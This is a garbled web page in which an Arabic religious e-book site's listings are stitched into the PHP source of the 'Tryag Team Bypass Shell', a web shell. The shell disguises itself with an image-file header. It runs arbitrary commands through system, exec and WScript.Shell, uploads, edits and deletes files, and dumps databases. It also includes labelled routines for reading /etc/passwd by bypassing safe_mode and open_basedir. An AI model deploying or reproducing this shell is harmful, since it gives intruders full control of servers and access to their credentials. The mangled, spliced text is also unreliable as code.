"; $dirs=@opendir($dir); $dir_i = '0'; while ($file=@readdir($dirs)) { $filepath="$dir/$file"; $a=@is_dir($filepath); if($a=="1"){ if($file!=".." && $file!=".") { $ctime=@date("Y-m-d H:i:s",@filectime($filepath)); $mtime=@date("Y-m-d H:i:s",@filemtime($filepath)); $dirperm=substr(base_convert(fileperms($filepath),10,8),-4); echo "n"; echo " n"; echo " n"; echo " n"; echo " n"; echo " n"; echo "n"; $dir_i++; } else { if($file=="..") { echo "n"; echo " n"; echo "n"; } } } }// while @closedir($dirs); echo""; $dirs=@opendir($dir); $file_i = '0'; while ($file=@readdir($dirs)) { $filepath="$dir/$file"; $a=@is_dir($filepath); if($a=="0"){ $size=@filesize($filepath); $size=$size/1024 ; $size= @number_format($size, 3); if (@filectime($filepath) == @filemtime($filepath)) { $ctime=@date("Y-m-d H:i:s",@filectime($filepath)); $mtime=@date("Y-m-d H:i:s",@filemtime($filepath)); } else { $ctime="".@date("Y-m-d H:i:s",@filectime($filepath)).""; $mtime="".@date("Y-m-d H:i:s",@filemtime($filepath)).""; } @$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4); echo "n"; echo " n"; if ($file == 'config.php') { echo "$filen"; } echo " n"; echo " n"; echo " n"; echo " n"; echo "n"; $file_i++; } }// while @closedir($dirs); echo "n"; echo "

الأقسام الرئيسية كتب دينية فلسطين وقضايا الأمة كتب الادارة و التطوير كتب الفلسفة كتب التاريخ كتب العلوم الطبيعية كتب الادب و الروايات كتب السياسة كتب الكمبيوتر استطلاع الزوار مارأيك بالموقع جميل 59.09 % رائع 18.18 % ممتاز 22.73 %	أحدث الكتب معنى لا إله إلا الله ومقتضاها وآثارها في الفرد والمجتمع العقيدة الواسطية شرح حصن المسلم من أذكار الكتاب والسنة الدروس المهمة لعامة الأمة العقيدة الصحيحة وما يضادها ونواقض الإسلام سبعون مسألة في الصيام عقيدة أهل السنة والجماعة كشف الشبهات في التوحيد أعلام السنة المنشورة في اعتقاد الطائفة المنصورة [ 200 سؤال وجواب في العقيدة ] شرح ستة مواضع من السيرة أخطار تهدد البيوت تلخيص فقه الفرائض تطهير الاعتقاد من أدران الإلحاد تحذير الساجد من اتخاذ القبور مساجد الواسطة بين الحق والخلق التعليقات المختصرة على متن الطحاوية التحفة العراقية في الأعمال القلبية العقيدة الطحاوية كتاب التوحيد الذي هو حق الله على العبيد رسالة في سجود السهو من بدائع القصص النبوي الصحيح تفسير وبيان لأعظم سورة في القرآن نداء إلى المربين والمربيات لتوجيه الأبناء والبنات الحج المبرور شهادة الإسلام لا إله إلا الله كيف نربي أولادنا تربية إسلامية صحيحة ؟ نواقض الإسلام الدعوة إلى الله وأخلاق الدعاة الدعاء من الكتاب والسنة حكم التوسل بالأولياء والصالحين حراسة الفضيلة شرح العقيدة الأصفهانية التبرج وخطر مشاركة المرأة للرجل في العمل منزلة الصلاة في الإسلام في ضوء الكتاب والسنة الإسلام أصوله ومبادئه دين الحق نور الشيب وحكم تغييره قيام الليل الأذان والإقامة في ضوء الكتاب والسنة الجهاد في سبيل الله صلاة الجماعة في ضوء الكتاب والسنة آفات اللسان في ضوء الكتاب والسنة وداع الرسول صلى الله عليه وسلم لأمته صلاة المسافر في ضوء الكتاب والسنة طهور المسلم في ضوء الكتاب والسنة العلاج بالرقى من الكتاب والسنة شروط الدعاء وموانع الإجابة حكم الطهارة لمس القرآن الكريم معالم تربوية من سيرة الإمام ابن باز رحمه الله الأنوار الرحمانية لهداية الفرقة التيجانية وفروا اللحى وأحفوا الشوارب صلاة الإستسقاء في ضوء الكتاب والسنة سجود السهو في ضوء الكتاب والسنة تبريد حرارة المصيبة عند موت الأحباب نور التوحيد وظلمات الشرك نور السنة وظلمات البدعة صلاة الكسوف في ضوء الكتاب والسنة نور الإسلام وظلمات الكفر نور الإخلاص وظلمات إرادة الدنيا بعمل الآخرة في ضوء الكتاب والسنة قرة عيون المصلين في بيان صفة صلاة المحسنين في ضوء الكتاب والسنة صلاة الخوف في ضوء الكتاب والسنة شرح منظومة القواعد الفقهية أسئلة وأجوبة في الإيمان والكفر شرح عقيدة أهل السنة والجماعة رفع الملام عن الأئمة الأعلام العلم فضله وآدابه ووسائله العلماء هم الدعاة حكم الاحتفال بالمولد والرد على من أجازه تسمية المولود فتاوى إمام المفتين ورسول رب العالمين صفة صلاة النبي صلى الله عليه وسلم بيان عقيدة أهل السنة والجماعة ولزوم اتباعها التقليد والافتاء والاستفتاء رسائل الأفراح أسئلة وأجوبة في مسائل الإيمان والكفر أسئلة الأسرة المسلمة 48 سؤالاً في الصيام حقوق آل البيت بين السنة والبدعة الزيارة الشرعية والزيارة البدعية رسالة في حكم السحر والكهانة قضية التكفير بين أهل السنة وفرق الضلال الأجوبة النافعة عن أسئلة لجنة مسجد الجامعة الربا أضراره وآثاره في ضوء الكتاب والسنة الإبداع في كمال الشرع وخطر الابتداع رسالة الحجاب البيان المفيد فيما اتفق عليه علماء مكة ونجد من عقائد التوحيد الفكر الصوفي في ضوء الكتاب والسنة زينة المرأة المسلمة منظومة المفيد في علم التجويد طلائع الفجر في الجمع بين قراءتي عاصم وأبي عمرو تيسير الأمر في الجمع بين قراءتي عاصم وأبي عمرو الفوز الكبير في الجمع بين قراءتي عاصم وابن كثير توضيح المعالم في الجمع بين روايتي حفص وشعبة عن عاصم الملخص الفقهي حقيقة التصوف وموقف الصوفية من أصول العبادة والدين الإرشاد إلى صحيح الاعتقاد والرد على أهل الشرك والعناد الولاء والبراء في الإسلام عقيدة التوحيد شرح كتاب مقدمة في أصول التفسير لابن تيمية كيف يجب أن نفسر القرآن الكريم؟	لغات الكتب العربية English Français مواقع صديقه GIF89a JFIF; Tryag Team Bypass Shell »ٌب، URL ؤعبYت§°ـ "; exit; } if (empty($_POST['TrYaG'] ) ) { }ELSE{ $action = '?action=TrYaG'; echo " الكاسر ال?هبي Tryag Team GullerSultani.Net "; echo " "; exit; } if (empty($_POST['command'] ) ) { }ELSE{ if (substr(PHP_OS, 0, 3) == 'WIN') { $program = isset($_POST['program']) ? $_POST['program'] : "c:winntsystem32cmd.exe"; $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname."/log.txt"; echo "n"; } $tb = new FORMS; $tb->tableheader(); $tb->tdbody(' '.$_SERVER['HTTP_HOST'].' '.$mohajer.' '.$_SERVER['REMOTE_ADDR'].' ','center','top'); $tb->tdbody(" "); $tb->tablefooter(); $tb->tableheader(); $tb->tdbody(' command [ system , shell_exec , passthru , Wscript.Shell , exec , popen ] ','center','top'); $tb->tdbody(' '); $execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen'); $tb->headerform(array('content'=>'cmd:'.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' '.$tb->makeinput('command').' '.$tb->makeinput('Run','command','','submit'))); echo" "; if ($_POST['command'] ) { if ($execfunc=="system") { system($_POST['command']); } elseif ($execfunc=="passthru") { passthru($_POST['command']); } elseif ($execfunc=="exec") { $result = exec($_POST['command']); echo $result; } elseif ($execfunc=="shell_exec") { $result=shell_exec($_POST['command']); echo $result; } elseif ($execfunc=="popen") { $pp = popen($_POST['command'], 'r'); $read = fread($pp, 2096); echo $read; pclose($pp); } elseif ($execfunc=="wscript") { $wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll') or die("PHP Create COM WSHSHELL failed"); $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['command'].""); $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput; } else { system($_POST['command']); } } echo" "; exit; }//end shell if ($_POST['editfile']){ $fp = fopen($_POST['editfile'], "r"); $filearr = file($_POST['editfile']); foreach ($filearr as $string){ $content = $content . $string; } echo " Edit file: $editfile ";echo htmlentities($content); echo""; echo" "; fclose($fp); } if($_POST['savefile']){ $fp = fopen($_POST['savefile'], "w"); $content = stripslashes($content); fwrite($fp, $content); fclose($fp); echo " Successfully saved! "; } if ($doupfile) { echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfile']['name']."")) ? "ةد´«³ة¹¦!" : "ةد´«ت§°ـ!"; } elseif (($createdirectory) AND !empty($_POST['newdirectory'])) { if (!empty($newdirectory)) { $mkdirs="$dir/$newdirectory"; if (file_exists("$mkdirs")) { echo "can't make dir"; } else { echo (@mkdir("$mkdirs",0777)) ? "ok" : ""; @chmod("$mkdirs",0777); } } } ///////// $pathname=str_replace('\','/',dirname(__FILE__)); //////// if (!isset($dir) or empty($dir)) { $dir = "."; $nowpath = getPath($pathname, $dir); } else { $dir=$_post['dir']; $nowpath = getPath($pathname, $dir); } /////// $dir_writeable = (dir_writeable($nowpath)) ? "m" : "mm"; $phpinfo=(!eregi("phpinfo",$dis_func)) ? " | PHPINFO()" : ""; $reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | " : ""; $tb = new FORMS; $tb->tableheader(); $tb->tdbody(' '.$_SERVER['HTTP_HOST'].' '.$mohajer.' '.$_SERVER['REMOTE_ADDR'].' ','center','top'); $tb->tdbody(" "); $tb->tablefooter(); $tb->tableheader(); $tb->tdbody(' Editfile or make & Uploud file & Make directory ','center','top'); $tb->tdbody(' '); $tb->headerform(array('content'=>'File to edit or make:'.$tb->makehidden('dir', getcwd() ).' '.$tb->makeinput('editfile').' '.$tb->makeinput('Edit','editfile','','submit'))); $tb->headerform(array('action'=>'?dir='.urlencode($dir),'enctype'=>'multipart/form-data','content'=>'Uploud file:'.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','up','','submit').$tb->makeinput('uploaddir',$dir,'','hidden'))); $tb->headerform(array('content'=>'Make directory: '.$tb->makeinput('newdirectory').' '.$tb->makeinput('createdirectory','newdirectory','','submit'))); $execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen'); $tb->headerform(array('content'=>'cmd:'.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' '.$tb->makeinput('command').' '.$tb->makeinput('Run','command','','submit'))); $tb->tdbody (" "); if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) { $tb->tableheader(); echo"
DIR	First data	Last data	Size	Perm
[$file]	$ctime	$mtime	<dir>	$dirperm
Up dir
"; echo ""; echo "$file	$ctime	$mtime	$size KB	$fileperm

n"; }// end dir function debuginfo() { global $starttime; $mtime = explode(' ', microtime()); $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6); echo "Processed in $totaltime second(s)"; } function stripslashes_array(&$array) { while(list($key,$var) = each($array)) { if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) { if (is_string($var)) { $array[$key] = stripslashes($var); } if (is_array($var)) { $array[$key] = stripslashes_array($var); } } } return $array; } function deltree($deldir) { $mydir=@dir($deldir); while($file=$mydir->read()) { if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) { @chmod("$deldir/$file",0777); deltree("$deldir/$file"); } if (is_file("$deldir/$file")) { @chmod("$deldir/$file",0777); @unlink("$deldir/$file"); } } $mydir->close(); @chmod("$deldir",0777); return (@rmdir($deldir)) ? 1 : 0; } function dir_writeable($dir) { if (!is_dir($dir)) { @mkdir($dir, 0777); } if(is_dir($dir)) { if ($fp = @fopen("$dir/test.txt", 'w')) { @fclose($fp); @unlink("$dir/test.txt"); $writeable = 1; } else { $writeable = 0; } } return $writeable; } function getrowbg() { global $bgcounter; if ($bgcounter++%2==0) { return "firstalt"; } else { return "secondalt"; } } function getPath($mainpath, $relativepath) { global $dir; $mainpath_info = explode('/', $mainpath); $relativepath_info = explode('/', $relativepath); $relativepath_info_count = count($relativepath_info); for ($i=0; $i<$relativepath_info_count; $i++) { if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue; if ($relativepath_info[$i] == '..') { $mainpath_info_count = count($mainpath_info); unset($mainpath_info[$mainpath_info_count-1]); continue; } $mainpath_info[count($mainpath_info)] = $relativepath_info[$i]; } return implode('/', $mainpath_info); } function getphpcfg($varname) { switch($result = get_cfg_var($varname)) { case 0: return "No"; break; case 1: return "Yes"; break; default: return $result; break; } } function getfun($funName) { return (false !== function_exists($funName)) ? "Yes" : "No"; } class PHPZip{ var $out=''; function PHPZip($dir) { if (@function_exists('gzcompress')) { $curdir = getcwd(); if (is_array($dir)) $filelist = $dir; else{ $filelist=$this -> GetFileList($dir);//خؤ¼?ء?±ي foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1); } if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir); else chdir($curdir); if (count($filelist)>0){ foreach($filelist as $filename){ if (is_file($filename)){ $fd = fopen ($filename, "r"); $content = @fread ($fd, filesize ($filename)); fclose ($fd); if (is_array($dir)) $filename = basename($filename); $this -> addFile($content, $filename); } } $this->out = $this -> file(); chdir($curdir); } return 1; } else return 0; } function GetFileList($dir){ static $a; if (is_dir($dir)) { if ($dh = opendir($dir)) { while (($file = readdir($dh)) !== false) { if($file!='.' && $file!='..'){ $f=$dir .'/'. $file; if(is_dir($f)) $this->GetFileList($f); $a[]=$f; } } closedir($dh); } } return $a; } var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = "x50x4bx05x06x00x00x00x00"; var $old_offset = 0; function unix2DosTime($unixtime = 0) { $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); if ($timearray['year'] < 1980) { $timearray['year'] = 1980; $timearray['mon'] = 1; $timearray['mday'] = 1; $timearray['hours'] = 0; $timearray['minutes'] = 0; $timearray['seconds'] = 0; } // end if return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); } function addFile($data, $name, $time = 0) { $name = str_replace('\', '/', $name); $dtime = dechex($this->unix2DosTime($time)); $hexdtime = 'x' . $dtime[6] . $dtime[7] . 'x' . $dtime[4] . $dtime[5] . 'x' . $dtime[2] . $dtime[3] . 'x' . $dtime[0] . $dtime[1]; eval('$hexdtime = "' . $hexdtime . '";'); $fr = "x50x4bx03x04"; $fr .= "x14x00"; $fr .= "x00x00"; $fr .= "x08x00"; $fr .= $hexdtime; $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $c_len = strlen($zdata); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $fr .= pack('v', strlen($name)); $fr .= pack('v', 0); $fr .= $name; $fr .= $zdata; $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $this -> datasec[] = $fr; $new_offset = strlen(implode('', $this->datasec)); $cdrec = "x50x4bx01x02"; $cdrec .= "x00x00"; $cdrec .= "x14x00"; $cdrec .= "x00x00"; $cdrec .= "x08x00"; $cdrec .= $hexdtime; $cdrec .= pack('V', $crc); $cdrec .= pack('V', $c_len); $cdrec .= pack('V', $unc_len); $cdrec .= pack('v', strlen($name) ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('V', 32 ); $cdrec .= pack('V', $this -> old_offset ); $this -> old_offset = $new_offset; $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function file() { $data = implode('', $this -> datasec); $ctrldir = implode('', $this -> ctrl_dir); return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "x00x00"; } } function sqldumptable($table, $fp=0) { $tabledump = "DROP TABLE IF EXISTS $table;n"; $tabledump .= "CREATE TABLE $table (n"; $firstfield=1; $fields = mysql_query("SHOW FIELDS FROM $table"); while ($field = mysql_fetch_array($fields)) { if (!$firstfield) { $tabledump .= ",n"; } else { $firstfield=0; } $tabledump .= " $field[Field] $field[Type]"; if (!empty($field["Default"])) { $tabledump .= " DEFAULT '$field[Default]'"; } if ($field['Null'] != "YES") { $tabledump .= " NOT NULL"; } if ($field['Extra'] != "") { $tabledump .= " $field[Extra]"; } } mysql_free_result($fields); $keys = mysql_query("SHOW KEYS FROM $table"); while ($key = mysql_fetch_array($keys)) { $kname=$key['Key_name']; if ($kname != "PRIMARY" and $key['Non_unique'] == 0) { $kname="UNIQUE|$kname"; } if(!is_array($index[$kname])) { $index[$kname] = array(); } $index[$kname][] = $key['Column_name']; } mysql_free_result($keys); while(list($kname, $columns) = @each($index)) { $tabledump .= ",n"; $colnames=implode($columns,","); if ($kname == "PRIMARY") { $tabledump .= " PRIMARY KEY ($colnames)"; } else { if (substr($kname,0,6) == "UNIQUE") { $kname=substr($kname,7); } $tabledump .= " KEY $kname ($colnames)"; } } $tabledump .= "n);nn"; if ($fp) { fwrite($fp,$tabledump); } else { echo $tabledump; } $rows = mysql_query("SELECT * FROM $table"); $numfields = mysql_num_fields($rows); while ($row = mysql_fetch_array($rows)) { $tabledump = "INSERT INTO $table VALUES("; $fieldcounter=-1; $firstfield=1; while (++$fieldcounter<$numfields) { if (!$firstfield) { $tabledump.=", "; } else { $firstfield=0; } if (!isset($row[$fieldcounter])) { $tabledump .= "NULL"; } else { $tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'"; } } $tabledump .= ");n"; if ($fp) { fwrite($fp,$tabledump); } else { echo $tabledump; } } mysql_free_result($rows); } class FORMS { function tableheader() { echo "n"; } function headerform($arg=array()) { global $dir; if ($arg[enctype]){ $enctype="enctype="$arg[enctype]""; } else { $enctype=""; } if (!isset($arg[method])) { $arg[method] = "POST"; } if (!isset($arg[action])) { $arg[action] = ''; } echo " n"; echo " n"; echo " n"; echo " n"; echo " n"; } function tdheader($title) { global $dir; echo " n"; echo " n"; echo " n"; } function tdbody($content,$align='center',$bgcolor='2',$height='',$extra='',$colspan='') { if ($bgcolor=='2') { $css="secondalt"; } elseif ($bgcolor=='1') { $css="firstalt"; } else { $css=$bgcolor; } $height = empty($height) ? "" : " height=".$height; $colspan = empty($colspan) ? "" : " colspan=".$colspan; echo " n"; echo " n"; echo " n"; } function tablefooter() { echo "

".$arg[content]."

".$title." [·mohajer]

".$content."

n"; } function formheader($action='',$title,$target='') { global $dir; $target = empty($target) ? "" : " target="".$target."""; echo "

n"; echo " n"; echo " ".$title." [·µ»ط]n"; echo " n"; } function makehidden($name,$value=''){ echo "n"; } function makeinput($name,$value='',$extra='',$type='text',$size='30',$css='input'){ $css = ($css == 'input') ? " class="input"" : ""; $input = "n"; return $input; } function makeid($name,$value='',$extra='',$type='select',$size='30',$css='input'){ $css = ($css == 'input') ? " class="input"" : ""; $input = "cat /etc/passwd"; return $input; } function makeimp($name,$value='',$extra='',$type='select',$size='30',$css='input'){ $css = ($css == 'input') ? " class="input"" : ""; $input = "View fileView dir"; return $input; } function maketextarea($name,$content='',$cols='100',$rows='20',$extra=''){ $textarea = "".$content."n"; return $textarea; } function formfooter($over='',$height=''){ $height = empty($height) ? "" : " height="".$height."""; echo " n"; echo " n"; echo " n"; echo "

n"; echo $end = empty($over) ? "" : "n"; } function makeselect($arg = array()){ if ($arg[multiple]==1) { $multiple = " multiple"; if ($arg[size]>0) { $size = "size=$arg[size]"; } } if ($arg[css]==0) { $css = "class="input""; } $select = "n"; if (is_array($arg[option])) { foreach ($arg[option] AS $key=>$value) { if (!is_array($arg[selected])) { if ($arg[selected]==$key) { $select .= "$valuen"; } else { $select .= "$valuen"; } } elseif (is_array($arg[selected])) { if ($arg[selected][$key]==1) { $select .= "$valuen"; } else { $select .= "$valuen"; } } } } $select .= "n"; return $select; } } $tb->tableheader(); $tb->tdbody('

Exploit: read file [SQL , id , CURL , copy , ini_restore , imap] & Make file ERORR

','center','top'); $tb->tdbody('

'); $tb->headerform(array('content'=>'read file SQL: ' .$tb->makeinput('Mohajer22','/etc/passwd' ).$tb->makeinput('',Show,'Mohajer22','submit'))); $tb->headerform(array('content'=>'read file id: ' .$tb->makeid('plugin','cat /etc/passwd' ).$tb->makeinput('',Show,'plugin','submit'))); $tb->headerform(array('content'=>'read file CURL: ' .$tb->makeinput('curl','/etc/passwd' ).$tb->makeinput('',Show,'curl','submit'))); $tb->headerform(array('content'=>'read file copy: ' .$tb->makeinput('copy','/etc/passwd' ).$tb->makeinput('',Show,'copy','submit'))); $tb->headerform(array('content'=>'read file ini_restore: ' .$tb->makeinput('M2','/etc/passwd' ).$tb->makeinput('',Show,'M2','submit'))); $tb->headerform(array('content'=>'read file or dir with imap: ' .$tb->makeimp('switch','/etc/passwd' ).$tb->makeinput('string','/etc/passwd' ).$tb->makeinput('string','Show','','submit'))); $tb->headerform(array('content'=>'Make file ERORR: ' .$tb->makeinput('ER','Mohajer22.php' ).$tb->makeinput('ER','Write','ER','submit'))); // read file SQL ( ) // if(empty($_POST['Mohajer22'])){ } else { echo "read file SQL"," " ; echo ""; $file=$_POST['Mohajer22']; $mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf"; $mysql_files = explode(':', $mysql_files_str); $sql = array ( "USE $mdb", 'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)', "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS " . "TERMINATED BY '__THIS_NEVER_HAPPENS__' " . "ESCAPED BY '' " . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'", "SELECT a FROM $tbl LIMIT 1" ); mysql_connect ($mhost, $muser, $mpass); foreach ($sql as $statement) { $q = mysql_query ($statement); if ($q == false) die ( "FAILED: " . $statement . "n" . "REASON: " . mysql_error () . "n" ); if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue; echo htmlspecialchars($r[0]); mysql_free_result ($q); } echo ""; } // ERORR // if(empty($_POST['ER'])){ } else { $ERORR=$_POST['ER']; echo error_log(" By TrYaG Team ", 3,$ERORR); } // id // if ($_POST['plugin'] ){ echo "read file id" ," "; echo ""; for($uid=0;$uid<60000;$uid++){ //cat /etc/passwd $ara = posix_getpwuid($uid); if (!empty($ara)) { while (list ($key, $val) = each($ara)){ print "$val:"; } print "n"; } } echo ""; break; } // CURL // if(empty($_POST['curl'])){ } else { echo "read file CURL"," " ; echo ""; $m=$_POST['curl']; $ch = curl_init("file:///".$m."x00/../../../../../../../../../../../../".__FILE__); curl_exec($ch); var_dump(curl_exec($ch)); echo ""; } // copy// $u1p=""; $tymczas=""; if(empty($_POST['copy'])){ } else { echo "read file copy" ," "; echo ""; $u1p=$_POST['copy']; $temp=tempnam($tymczas, "cx"); if(copy("compress.zlib://".$u1p, $temp)){ $zrodlo = fopen($temp, "r"); $tekst = fread($zrodlo, filesize($temp)); fclose($zrodlo); echo "".htmlspecialchars($tekst).""; unlink($temp); echo ""; } else { die("Sorry... File ".htmlspecialchars($u1p)." dosen't exists or you don't have access."); } } /// ini_restore // if(empty($_POST['M2'])){ } else { echo "read file ini_restore"," "; echo ""; $m=$_POST['M2']; echo ini_get("safe_mode"); echo ini_get("open_basedir"); $s=readfile("$m"); ini_restore("safe_mode"); ini_restore("open_basedir"); echo ini_get("safe_mode"); echo ini_get("open_basedir"); $s=readfile("$m"); echo ""; } // imap // $string = !empty($_POST['string']) ? $_POST['string'] : 0; $switch = !empty($_POST['switch']) ? $_POST['switch'] : 0; if ($string && $switch == "file") { echo "read file imap" ," "; echo ""; $stream = imap_open($string, "", ""); $str = imap_body($stream, 1); if (!empty($str)) echo "<pre>".$str."</pre>"; imap_close($stream); echo ""; } elseif ($string && $switch == "dir") { echo "read dir imap"," " ; echo ""; $stream = imap_open("/etc/passwd", "", ""); if ($stream == FALSE) die("Can't open imap stream"); $string = explode("|",$string); if (count($string) > 1) $dir_list = imap_list($stream, trim($string[0]), trim($string[1])); else $dir_list = imap_list($stream, trim($string[0]), "*"); echo "<pre>"; for ($i = 0; $i < count($dir_list); $i++) echo "$dir_list[$i]"."<p> </p>" ; echo "</pre>"; imap_close($stream); echo ""; } $tb->tdbody ("

"); // open dir // $tb->tableheader(); $tb->tdbody('

Exploit: Open dir

','center','top'); $tb->tdbody('

'); if(empty($_POST['m'])){ echo " path dir "; } else { $m=$_POST['m']; $spath = $m ; $path = $m ; $method = intval(trim($_POST['method'])); $handle = opendir($path); $_folders = array(); $i = 0; while (false !== ($file = readdir($handle))) { $full_path = "$path/$file"; $perms = substr(sprintf('%o', fileperms($full_path)), -4); if ((is_dir($full_path)) && ($perms == '0777')) { if (!file_exists('.*')) { $_folders[$i] = $file; $i++; } } } closedir($handle); clearstatcache(); echo 'The folders is 777 : '; foreach ($_folders as $folder) { echo $folder.' '; } ////////// $handle = opendir($path); $_folders = array(); $i = 0; while (false !== ($file1 = readdir($handle))) { $full_path = "$path/$file1"; $perms = substr(sprintf('%o', fileperms($full_path)), -4); if ((is_dir($full_path)) && ($perms == '0755')) { if (!file_exists('.*')) { $_folders[$i] = $file1; $i++; } } } clearstatcache(); echo 'The folders is 755 : '; foreach ($_folders as $folder) { echo $folder.' '; } ////////// $handle = opendir($path); $_folders = array(); $i = 0; while (false !== ($file1 = readdir($handle))) { $full_path = "$path/$file1"; $perms = substr(sprintf('%o', fileperms($full_path)), -4); if ((is_dir($full_path)) && ($perms == '0644')) { if (!file_exists('.*')) { $_folders[$i] = $file1; $i++; } } } clearstatcache(); echo 'The folders is 644 : '; foreach ($_folders as $folder) { echo $folder.' '; } ////////// $handle = opendir($path); $_folders = array(); $i = 0; while (false !== ($file1 = readdir($handle))) { $full_path = "$path/$file1"; $perms = substr(sprintf('%o', fileperms($full_path)), -4); if ((is_dir($full_path)) && ($perms == '0750')) { if (!file_exists('.*')) { $_folders[$i] = $file1; $i++; } } } clearstatcache(); echo 'The folders is 750 : '; foreach ($_folders as $folder) { echo $folder.' '; } ////////// $handle = opendir($path); $_folders = array(); $i = 0; while (false !== ($file1 = readdir($handle))) { $full_path = "$path/$file1"; $perms = substr(sprintf('%o', fileperms($full_path)), -4); if ((is_dir($full_path)) && ($perms == '0604')) { if (!file_exists('.*')) { $_folders[$i] = $file1; $i++; } } } clearstatcache(); echo 'The folders is 604 : '; foreach ($_folders as $folder) { echo $folder.' '; } ////////// $handle = opendir($path); $_folders = array(); $i = 0; while (false !== ($file1 = readdir($handle))) { $full_path = "$path/$file1"; $perms = substr(sprintf('%o', fileperms($full_path)), -4); if ((is_dir($full_path)) && ($perms == '0705')) { if (!file_exists('.*')) { $_folders[$i] = $file1; $i++; } } } clearstatcache(); echo 'The folders is 705 : '; foreach ($_folders as $folder) { echo $folder.' '; } ////////// $handle = opendir($path); $_folders = array(); $i = 0; while (false !== ($file1 = readdir($handle))) { $full_path = "$path/$file1"; $perms = substr(sprintf('%o', fileperms($full_path)), -4); if ((is_dir($full_path)) && ($perms == '0606')) { if (!file_exists('.*')) { $_folders[$i] = $file1; $i++; } } } clearstatcache(); echo 'The folders is 606 : '; foreach ($_folders as $folder) { echo $folder.' '; } ////////// $handle = opendir($path); $_folders = array(); $i = 0; while (false !== ($file1 = readdir($handle))) { $full_path = "$path/$file1"; $perms = substr(sprintf('%o', fileperms($full_path)), -4); if ((is_dir($full_path)) && ($perms == '0703')) { if (!file_exists('.*')) { $_folders[$i] = $file1; $i++; } } } clearstatcache(); echo 'The folders is 703 : '; foreach ($_folders as $folder) { echo $folder.' '; } } $handle = opendir($path); $_folders = array(); $i = 0; while (false !== ($file1 = readdir($handle))) { $full_path = "$path/$file1"; $perms = substr(sprintf('%o', fileperms($full_path)), -4); $_folders[$i] = $file1; $i++; } clearstatcache(); echo 'The folders and file all : '; foreach ($_folders as $folder) { echo $folder.' '; } echo 'The total : '.$i.' '; $tb->tdbody ("

"); $tb->tableheader(); $tb->tdbody('

Exploit: break fucking safe-mode

','center','top'); $tb->tdbody('

'); error_reporting(E_WARNING); ini_set("display_errors", 1); echo ""; echo " "; echo " Root directory: "; echo " "; // break fucking safe-mode ! $root = "/"; if($_POST['root']) $root = $_POST['root']; if (!ini_get('safe_mode')) die("Safe-mode is OFF."); echo ""; $c = 0; $D = array(); set_error_handler("eh"); $chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; for($i=0; $i < strlen($chars); $i++){ $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}"; $prevD = $D[count($D)-1]; glob($path."*"); if($D[count($D)-1] != $prevD){ for($j=0; $j < strlen($chars); $j++){ $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}"; $prevD2 = $D[count($D)-1]; glob($path."*"); if($D[count($D)-1] != $prevD2){ for($p=0; $p < strlen($chars); $p++){ $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}"; $prevD3 = $D[count($D)-1]; glob($path."*"); if($D[count($D)-1] != $prevD3){ for($r=0; $r < strlen($chars); $r++){ $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}"; glob($path."*"); } } } } } } } $D = array_unique($D); 